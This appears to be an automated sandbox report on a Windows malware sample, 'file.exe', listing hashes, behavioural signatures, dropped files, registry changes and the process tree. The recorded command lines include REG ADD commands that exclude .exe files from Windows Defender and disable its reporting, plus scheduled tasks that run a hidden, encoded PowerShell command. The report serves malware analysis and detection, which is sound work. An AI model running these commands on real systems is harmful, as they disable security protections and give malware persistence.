Analysis
-
max time kernel
140s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20231020-en -
resource tags
arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2023 18:38
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231020-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
13c54df3790dbde46fbe989793e21ce7
-
SHA1
ed331ca706aa52e6ddee7af22da490cc001749bc
-
SHA256
2cc26a714371577628a15d4b25ea23af43995d7d20b2a3fd891db403915e5e69
-
SHA512
e4904f745e3c06c834fcb98014fcb3054721a30b2d246047c0b4db1108cb58bb873cf398ab14a4777d2c69037b676238c7aa2f0660c6459dcfef6ad7f3f1c8c3
-
SSDEEP
196608:91OMVkbPbPFUEBQXzM14+H22JZu9c7eSL2r5bbk:3OMV0jPOECDMK+W2TXLO5k
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 79 1984 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1873812795-1433807462-1429862679-1000\Control Panel\International\Geo\Nation AXbMdvm.exe -
Executes dropped EXE 4 IoCs
pid Process 3792 Install.exe 3124 Install.exe 3916 zsHDrkM.exe 3840 AXbMdvm.exe -
Loads dropped DLL 1 IoCs
pid Process 1984 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json AXbMdvm.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json AXbMdvm.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini AXbMdvm.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\49C555742982D57C7C177BAF9E010F56 AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 AXbMdvm.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\49C555742982D57C7C177BAF9E010F56 AXbMdvm.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol zsHDrkM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 AXbMdvm.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 AXbMdvm.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini zsHDrkM.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 AXbMdvm.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B AXbMdvm.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\XfLIShEvOXUn\TDKtBha.dll AXbMdvm.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak AXbMdvm.exe File created C:\Program Files (x86)\rXjduNqsU\AUNgGgx.xml AXbMdvm.exe File created C:\Program Files (x86)\bNpaxMIFBfOU2\oQWqHpD.xml AXbMdvm.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi AXbMdvm.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja AXbMdvm.exe File created C:\Program Files (x86)\sExqNpidIxpuC\vMdCTDz.xml AXbMdvm.exe File created C:\Program Files (x86)\rXjduNqsU\JwFQvq.dll AXbMdvm.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi AXbMdvm.exe File created C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\lUrxCxD.dll AXbMdvm.exe File created C:\Program Files (x86)\sExqNpidIxpuC\BmaWtfv.dll AXbMdvm.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak AXbMdvm.exe File created C:\Program Files (x86)\bNpaxMIFBfOU2\rJJwfFmQhvAqA.dll AXbMdvm.exe File created C:\Program Files (x86)\jxiGQpNjugTNMjfxWSR\IBRSLAM.xml AXbMdvm.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\GVFFxSkoOBQmaesjx.job schtasks.exe File created C:\Windows\Tasks\ydgLTpiJkJvZaMG.job schtasks.exe File created C:\Windows\Tasks\jFAecgscnrJhBwrRF.job schtasks.exe File created C:\Windows\Tasks\bbPqNtaaeFeEtSKaKR.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4168 schtasks.exe 264 schtasks.exe 4628 schtasks.exe 2804 schtasks.exe 324 schtasks.exe 4756 schtasks.exe 2352 schtasks.exe 4540 schtasks.exe 3556 schtasks.exe 3928 schtasks.exe 5076 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" AXbMdvm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket AXbMdvm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8df29902-0000-0000-0000-d01200000000} AXbMdvm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" AXbMdvm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ AXbMdvm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" AXbMdvm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" AXbMdvm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" AXbMdvm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing AXbMdvm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8df29902-0000-0000-0000-d01200000000}\MaxCapacity = "14116" AXbMdvm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume AXbMdvm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix AXbMdvm.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 3972 powershell.EXE 3972 powershell.EXE 60 powershell.exe 60 powershell.exe 3132 powershell.exe 3132 powershell.exe 2952 powershell.EXE 2952 powershell.EXE 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe 3840 AXbMdvm.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3972 powershell.EXE Token: SeDebugPrivilege 60 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeDebugPrivilege 2952 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2784 wrote to memory of 3792 2784 file.exe 85 PID 2784 wrote to memory of 3792 2784 file.exe 85 PID 2784 wrote to memory of 3792 2784 file.exe 85 PID 3792 wrote to memory of 3124 3792 Install.exe 87 PID 3792 wrote to memory of 3124 3792 Install.exe 87 PID 3792 wrote to memory of 3124 3792 Install.exe 87 PID 3124 wrote to memory of 5028 3124 Install.exe 92 PID 3124 wrote to memory of 5028 3124 Install.exe 92 PID 3124 wrote to memory of 5028 3124 Install.exe 92 PID 3124 wrote to memory of 2388 3124 Install.exe 94 PID 3124 wrote to memory of 2388 3124 Install.exe 94 PID 3124 wrote to memory of 2388 3124 Install.exe 94 PID 5028 wrote to memory of 3676 5028 forfiles.exe 96 PID 5028 wrote to memory of 3676 5028 forfiles.exe 96 PID 5028 wrote to memory of 3676 5028 forfiles.exe 96 PID 2388 wrote to memory of 792 2388 forfiles.exe 97 PID 2388 wrote to memory of 792 2388 forfiles.exe 97 PID 2388 wrote to memory of 792 2388 forfiles.exe 97 PID 3676 wrote to memory of 2028 3676 cmd.exe 98 PID 3676 wrote to memory of 2028 3676 cmd.exe 98 PID 3676 wrote to memory of 2028 3676 cmd.exe 98 PID 792 wrote to memory of 3352 792 cmd.exe 99 PID 792 wrote to memory of 3352 792 cmd.exe 99 PID 792 wrote to memory of 3352 792 cmd.exe 99 PID 3676 wrote to memory of 3832 3676 cmd.exe 100 PID 3676 wrote to memory of 3832 3676 cmd.exe 100 PID 3676 wrote to memory of 3832 3676 cmd.exe 100 PID 792 wrote to memory of 3532 792 cmd.exe 101 PID 792 wrote to memory of 3532 792 cmd.exe 101 PID 792 wrote to memory of 3532 792 cmd.exe 101 PID 3124 wrote to memory of 4168 3124 Install.exe 103 PID 3124 wrote to memory of 4168 3124 Install.exe 103 PID 3124 wrote to memory of 4168 3124 Install.exe 103 PID 3124 wrote to memory of 1140 3124 Install.exe 105 PID 3124 wrote to memory of 1140 3124 Install.exe 105 PID 3124 wrote to memory of 1140 3124 Install.exe 105 PID 3972 wrote to memory of 456 3972 powershell.EXE 109 PID 3972 wrote to memory of 456 3972 powershell.EXE 109 PID 3124 wrote to memory of 116 3124 Install.exe 116 PID 3124 wrote to memory of 116 3124 Install.exe 116 PID 3124 wrote to memory of 116 3124 Install.exe 116 PID 3124 wrote to memory of 264 3124 Install.exe 118 PID 3124 wrote to memory of 264 3124 Install.exe 118 PID 3124 wrote to memory of 264 3124 Install.exe 118 PID 3916 wrote to memory of 60 3916 zsHDrkM.exe 122 PID 3916 wrote to memory of 60 3916 zsHDrkM.exe 122 PID 3916 wrote to memory of 60 3916 zsHDrkM.exe 122 PID 60 wrote to memory of 3356 60 powershell.exe 124 PID 60 wrote to memory of 3356 60 powershell.exe 124 PID 60 wrote to memory of 3356 60 powershell.exe 124 PID 3356 wrote to memory of 1576 3356 cmd.exe 125 PID 3356 wrote to memory of 1576 3356 cmd.exe 125 PID 3356 wrote to memory of 1576 3356 cmd.exe 125 PID 60 wrote to memory of 1972 60 powershell.exe 126 PID 60 wrote to memory of 1972 60 powershell.exe 126 PID 60 wrote to memory of 1972 60 powershell.exe 126 PID 60 wrote to memory of 3184 60 powershell.exe 127 PID 60 wrote to memory of 3184 60 powershell.exe 127 PID 60 wrote to memory of 3184 60 powershell.exe 127 PID 60 wrote to memory of 3532 60 powershell.exe 128 PID 60 wrote to memory of 3532 60 powershell.exe 128 PID 60 wrote to memory of 3532 60 powershell.exe 128 PID 60 wrote to memory of 4548 60 powershell.exe 129 PID 60 wrote to memory of 4548 60 powershell.exe 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Users\Admin\AppData\Local\Temp\7zSA22B.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3792 -
C:\Users\Admin\AppData\Local\Temp\7zSA42F.tmp\Install.exe.\Install.exe /OUdidfQn "525403" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3124 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3676 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2028
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3832
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:792 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3352
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:3532
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "grcTRDfCH" /SC once /ST 11:13:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4168
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "grcTRDfCH"4⤵PID:1140
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "grcTRDfCH"4⤵PID:116
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bbPqNtaaeFeEtSKaKR" /SC once /ST 18:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\krtsSySmQGsixlr\zsHDrkM.exe\" 8N /fjsite_idOuN 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:264
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3972 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:456
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4880
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4656
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4028
-
C:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\krtsSySmQGsixlr\zsHDrkM.exeC:\Users\Admin\AppData\Local\Temp\UcpCEAFeKxUwNazky\krtsSySmQGsixlr\zsHDrkM.exe 8N /fjsite_idOuN 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3916 -
